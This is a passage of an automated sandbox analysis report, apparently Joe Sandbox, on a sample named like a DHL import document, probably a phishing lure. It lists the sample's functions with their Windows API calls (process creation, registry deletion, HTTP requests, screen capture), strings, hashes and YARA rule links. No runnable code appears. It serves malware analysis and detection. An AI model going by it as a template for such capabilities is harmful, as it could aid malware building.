                                                                                            • Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007F016A
                                                                                            • Part of subcall function 007F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007F0195
                                                                                            • Part of subcall function 007F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007F01A0
                                                                                          • ___scrt_fastfail.LIBCMT ref: 007F00E7
                                                                                            • Part of subcall function 007F00A3: __onexit.LIBCMT ref: 007F00A9
                                                                                          Strings
                                                                                          • kernel32.dll, xrefs: 007F0133
                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 007F0122
                                                                                          • InitializeConditionVariable, xrefs: 007F0148
                                                                                          • SleepConditionVariableCS, xrefs: 007F0154
                                                                                          • WakeAllConditionVariable, xrefs: 007F0162
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                          • API String ID: 66158676-1714406822
                                                                                          • Opcode ID: c6eb68f0f2eff608ca48afe24724c1629cc4e96d261943a6d8ec49e930a97057
                                                                                          • Instruction ID: 6303c909ffef6788940f6b54cb48eb3dec738857836528f8a84504fbc325bee7
                                                                                          • Opcode Fuzzy Hash: c6eb68f0f2eff608ca48afe24724c1629cc4e96d261943a6d8ec49e930a97057
                                                                                          • Instruction Fuzzy Hash: 9121F932645719ABE7106BA4AC09B7E37D4FB06B51F01013AFA11E3793DFBCA8008AD0
                                                                                          Function 008330F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                          • API String ID: 176396367-1603158881
                                                                                          • Opcode ID: 2bfca5d3d9f5924261bb713e801e7817dcc6688e5f1ded78e9a3e43ff203a61f
                                                                                          • Instruction ID: 3f069a8fdb580bebec28862ccb1483c59c9de6f67c5c618e4f7b46a174bf9dfb
                                                                                          • Opcode Fuzzy Hash: 2bfca5d3d9f5924261bb713e801e7817dcc6688e5f1ded78e9a3e43ff203a61f
                                                                                          • Instruction Fuzzy Hash: 10E1C232A0051AEBCF159FA8C4556FEBBB0FF94710F54811AE556E7240DB34AE8987D0
                                                                                          Function 008444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CharLowerBuffW.USER32(00000000,00000000,0086CC08), ref: 00844527
                                                                                          • _wcslen.LIBCMT ref: 0084453B
                                                                                          • _wcslen.LIBCMT ref: 00844599
                                                                                          • _wcslen.LIBCMT ref: 008445F4
                                                                                          • _wcslen.LIBCMT ref: 0084463F
                                                                                          • _wcslen.LIBCMT ref: 008446A7
                                                                                            • Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD
                                                                                          • GetDriveTypeW.KERNEL32(?,00896BF0,00000061), ref: 00844743
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                          • API String ID: 2055661098-1000479233
                                                                                          • Opcode ID: 27eacb411a28058e6ab1dbeb85f73f808a3a3ac964ff5efdf27d6a9c1731583f
                                                                                          • Instruction ID: 8c8aea98fc1a022da58dd5bdf0b6691cec616b6ebb431e81d7a29d07f1fd13b9
                                                                                          • Opcode Fuzzy Hash: 27eacb411a28058e6ab1dbeb85f73f808a3a3ac964ff5efdf27d6a9c1731583f
                                                                                          • Instruction Fuzzy Hash: AEB12F3160830A9FC710EF28C890A7AB7E4FFA5724F51591DF596C7292E734D845CBA2
                                                                                          Function 0085AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0085B198
                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0085B1B0
                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0085B1D4
                                                                                          • _wcslen.LIBCMT ref: 0085B200
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0085B214
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0085B236
                                                                                          • _wcslen.LIBCMT ref: 0085B332
                                                                                            • Part of subcall function 008405A7: GetStdHandle.KERNEL32(000000F6), ref: 008405C6
                                                                                          • _wcslen.LIBCMT ref: 0085B34B
                                                                                          • _wcslen.LIBCMT ref: 0085B366
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0085B3B6
                                                                                          • GetLastError.KERNEL32(00000000), ref: 0085B407
                                                                                          • CloseHandle.KERNEL32(?), ref: 0085B439
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085B44A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085B45C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085B46E
                                                                                          • CloseHandle.KERNEL32(?), ref: 0085B4E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2178637699-0
                                                                                          • Opcode ID: c18004dc6fdac65c5825178564c34febfa652fadbe64b62e7bf18d83db88156c
                                                                                          • Instruction ID: 7b2ef1893a36b89d1627303fe31c5fc38e97c49753ab98c04b3b52e98780922c
                                                                                          • Opcode Fuzzy Hash: c18004dc6fdac65c5825178564c34febfa652fadbe64b62e7bf18d83db88156c
                                                                                          • Instruction Fuzzy Hash: F5F16931608240DFC724EF24C895A6ABBE1FF85314F14855EF8999B3A2DB35EC48CB52
                                                                                          Function 007D326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(008A1990), ref: 00812F8D
                                                                                          • GetMenuItemCount.USER32(008A1990), ref: 0081303D
                                                                                          • GetCursorPos.USER32(?), ref: 00813081
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0081308A
                                                                                          • TrackPopupMenuEx.USER32(008A1990,00000000,?,00000000,00000000,00000000), ref: 0081309D
                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008130A9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                          • String ID: 0
                                                                                          • API String ID: 36266755-4108050209
                                                                                          • Opcode ID: 52a4c98ad5c7377449a0874fa41a9130c041351c242c7500d799ecafb0278131
                                                                                          • Instruction ID: ed4a0b916b919ea08b27dd5c151211d9fd3c817012c63dc7d721bf4b5f8550f6
                                                                                          • Opcode Fuzzy Hash: 52a4c98ad5c7377449a0874fa41a9130c041351c242c7500d799ecafb0278131
                                                                                          • Instruction Fuzzy Hash: AF710970640205BEEB319F25CC49FEABF78FF05324F204216F515A62E1CBB5A960C791
                                                                                          Function 00866CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?), ref: 00866DEB
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00866E5F
                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00866E81
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00866E94
                                                                                          • DestroyWindow.USER32(?), ref: 00866EB5
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 00866EE4
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00866EFD
                                                                                          • GetDesktopWindow.USER32 ref: 00866F16
                                                                                          • GetWindowRect.USER32(00000000), ref: 00866F1D
                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00866F35
                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00866F4D
                                                                                            • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                          • String ID: 0$tooltips_class32
                                                                                          • API String ID: 2429346358-3619404913
                                                                                          • Opcode ID: f6e27176ed34654eb3c0e8a6abcb2e9c8686e778ece401ffa1bfd66a3be37a2d
                                                                                          • Instruction ID: b5c528f150ecfb227b7a8b46f79af5711c3675e08edde79e3c26513029dc0d6e
                                                                                          • Opcode Fuzzy Hash: f6e27176ed34654eb3c0e8a6abcb2e9c8686e778ece401ffa1bfd66a3be37a2d
                                                                                          • Instruction Fuzzy Hash: 4C718770104284AFEB21CF18DC48ABABBE9FB99304F59041EF999C7260DB75A925CB11
                                                                                          Function 0086911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00869147
                                                                                            • Part of subcall function 00867674: ClientToScreen.USER32(?,?), ref: 0086769A
                                                                                            • Part of subcall function 00867674: GetWindowRect.USER32(?,?), ref: 00867710
                                                                                            • Part of subcall function 00867674: PtInRect.USER32(?,?,00868B89), ref: 00867720
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 008691B0
                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008691BB
                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008691DE
                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00869225
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0086923E
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00869255
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00869277
                                                                                          • DragFinish.SHELL32(?), ref: 0086927E
                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00869371
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                          • API String ID: 221274066-3440237614
                                                                                          • Opcode ID: 646a59b66376ac8261d2447a152d290965c8fd05c0ff148e8cb9486f936a8af9
                                                                                          • Instruction ID: 47a3d88768edbb277b049bf12262ee936309eaf0adba2d4f54ea4eebdff827bd
                                                                                          • Opcode Fuzzy Hash: 646a59b66376ac8261d2447a152d290965c8fd05c0ff148e8cb9486f936a8af9
                                                                                          • Instruction Fuzzy Hash: 45614971108301AFD701DF64DC89DABBBF8FB89750F00091EF6A5922A1DB749A49CB52
                                                                                          Function 0084C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0084C4B0
                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0084C4C3
                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0084C4D7
                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0084C4F0
                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0084C533
                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0084C549
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0084C554
                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0084C584
                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0084C5DC
                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0084C5F0
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0084C5FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                          • String ID:
                                                                                          • API String ID: 3800310941-3916222277
                                                                                          • Opcode ID: 7c7974b4fd9aac7c6b8930ea445c1f2271698e2cc9bf523e7a422c7deab44a21
                                                                                          • Instruction ID: 87c155f5047aa058fed3e16aea6b86c3315bc707ec2626cb70ff30f288a46dd4
                                                                                          • Opcode Fuzzy Hash: 7c7974b4fd9aac7c6b8930ea445c1f2271698e2cc9bf523e7a422c7deab44a21
                                                                                          • Instruction Fuzzy Hash: 01516CB0501208BFDB619FA5C988ABB7BFCFF08754F01851AF985D6210EB74E944DB60
                                                                                          Function 0086856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00868592
                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 008685A2
                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 008685AD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008685BA
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 008685C8
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008685D7
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 008685E0
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008685E7
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 008685F8
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0086FC38,?), ref: 00868611
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00868621
                                                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00868641
                                                                                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00868671
                                                                                          • DeleteObject.GDI32(00000000), ref: 00868699
                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008686AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3840717409-0
                                                                                          • Opcode ID: 1f4cde0ca7867511182f2dbb8825c3d09636034977d6e094a01a874213776753
                                                                                          • Instruction ID: 8c0ee03b729cd119e666b5452f9cf51484597667cb4de168864900bc147bd730
                                                                                          • Opcode Fuzzy Hash: 1f4cde0ca7867511182f2dbb8825c3d09636034977d6e094a01a874213776753
                                                                                          • Instruction Fuzzy Hash: 0D412875600208EFDB119FA5DC4CEAA7BB8FF99B11F124159F95AEB260DB709901CB20
                                                                                          Function 008414BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00841502
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0084150B
                                                                                          • VariantClear.OLEAUT32(?), ref: 00841517
                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008415FB
                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00841657
                                                                                          • VariantInit.OLEAUT32(?), ref: 00841708
                                                                                          • SysFreeString.OLEAUT32(?), ref: 0084178C
                                                                                          • VariantClear.OLEAUT32(?), ref: 008417D8
                                                                                          • VariantClear.OLEAUT32(?), ref: 008417E7
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00841823
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                          • API String ID: 1234038744-3931177956
                                                                                          • Opcode ID: 5a0efe8a416a376a05adc904a96916925d1bb22837ae8ebc75c25daf62a4a28b
                                                                                          • Instruction ID: 242e56ca8debf9b197f6f140f768304596f6c0449338067d0e8bd013189e54fe
                                                                                          • Opcode Fuzzy Hash: 5a0efe8a416a376a05adc904a96916925d1bb22837ae8ebc75c25daf62a4a28b
                                                                                          • Instruction Fuzzy Hash: 8BD1BD31A0021DEBDF10AF65D88DAB9BBB5FF48704F158056E446EB680DB38E881DB61
                                                                                          Function 0085B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085B6F4
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085B772
                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0085B80A
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085B87E
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085B89C
                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0085B8F2
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0085B904
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0085B922
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0085B983
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0085B994
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                          • API String ID: 146587525-4033151799
                                                                                          • Opcode ID: 122c5a344822a908e8b7f21380bd8b50f8f363081989dcb7767612eeae36db3b
                                                                                          • Instruction ID: d85137b645c670c0b38d93e1ee4ff839a7c1c1b203ec9e2f03703b195c24bfd6
                                                                                          • Opcode Fuzzy Hash: 122c5a344822a908e8b7f21380bd8b50f8f363081989dcb7767612eeae36db3b
                                                                                          • Instruction Fuzzy Hash: C5C17B31204201EFD714DF14C495B2ABBE5FF94309F18859DE99A8B3A2CB75EC49CB92
                                                                                          Function 0085255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 008525D8
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008525E8
                                                                                          • CreateCompatibleDC.GDI32(?), ref: 008525F4
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00852601
                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0085266D
                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008526AC
                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008526D0
                                                                                          • SelectObject.GDI32(?,?), ref: 008526D8
                                                                                          • DeleteObject.GDI32(?), ref: 008526E1
